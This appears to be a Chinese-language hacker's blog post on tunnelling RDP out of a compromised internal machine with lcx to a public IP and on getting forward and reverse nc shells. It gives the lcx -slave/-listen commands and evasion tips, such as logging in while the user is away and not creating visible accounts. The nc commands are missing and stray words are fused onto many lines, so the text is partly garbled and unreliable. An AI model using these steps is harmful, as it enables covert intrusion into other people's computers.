內網端口轉發最多見的不外乎lcx與nc反彈了,很久不用快忘了,今天總結一下shell
一.使用lcx進行內網端口轉發windows
Lcx.exe是一個端口轉發工具,至關於把目標服務器A上的3389端口轉發到具備外網ip地址的B機上(即咱們本身的主機或是已經控制的主機),這樣連接B機的3389端口就至關於連接A機的3389端口了,Lcx程序多用於被控制計算機處於內網的時候,被控制機可能中了木馬程序,雖然可以進行控制,但仍是沒有使用遠程終端登陸到本機進行管理方便,所以在不少狀況下,都會千方百計在被控制計算機上開啓3389端口,而後經過lcx等進行端口轉發,進而在本地鏈接到被控制計算機的遠程終端並進行管理和使用。服務器
1.肯定被控制計算機的IP地址網絡
ipconfig /all查看網絡配置狀況,例如被控計算機的IP爲192.168.80.129工具
二、在被控制計算機上執行端口轉發命令blog
lcx.exe –slave 公網IP +端口 內網IP +端口ip
在被控制計算機上(A機)執行 lcx -slave 218.69.13.35 51 192.168.80.129 3389,執行完成後會給出一些提示。以下圖:cmd
說明:登錄
lcx一共有三條命令,第一條命令(lcx -listen 51 3389)(3389能夠設置爲任意沒使用的端口數字)是在具備外網獨立IP的計算機上執行(即B機),表示在本機上監聽51端口,該端口主要是接受被控制計算機3389端口轉發過來的數據;第二條命令(lcx -slave 218.69.13.35 51 192.168.80.129 3389)表示將本機IP地址爲192.168.80.129的3389端口轉發到遠程地址爲218.69.13.35的51端口上;第三條命令式端口轉向。配置
3.在本機上執行監聽命令
在本機cmd下執行 lcx -listen 51 3389命令,監聽51端口,監聽成功後,會顯示以下圖:
注:這個時候已經將內網的3389轉發到了公網機器的3389端口,咱們在本地機器上遠程公網IP+3389 ,就鏈接上了內網機器的3389
注意:
(1)在本機上監聽的端口必須是未使用的端口,可使用 netstat -an |find 「51」命令來進行查看,若是沒有顯示結果則是表示51端口能夠用來進行監聽。
(2)被控制計算機與本機成功創建鏈接後會不停的顯示鏈接數據,若是未出現發送數據和接受的狀況,說明鏈接創建不成功。以下圖:
4.在本機使用遠程終端進行登陸
打開遠程終端鏈接器,輸入127.0.0.1進行鏈接後,便可遠程進入被控制計算機的桌面,
注意:
(1)若是被控制的計算機是服務器,則在登陸時能夠直接進行登錄;若是被控制計算機是windows系統,則最好選擇用戶不在計算機的時間進行登錄,不然容易被發現;
(2)不要輕易在被控制計算機上創建帳號,尤爲是windows,創建帳號後,會當即在登錄界面中進行顯示。
二.nc反彈
最好記的就是用真實操做來作筆記了
nc反彈有正向鏈接與反向鏈接
環境:本機:192.168.43.142(win7) 遠程機器:192.168.43.137(xp)
1.nc正向鏈接
在遠程機
---返回xp的cmdshell
在本機
成功以後,本地機器就得到了一個遠程機器的shell
2.nc反向鏈接
在本機運行上
在遠程機
而後成功以後,咱們在本地機器上看一下,已經得到了遠程機器的cmdshell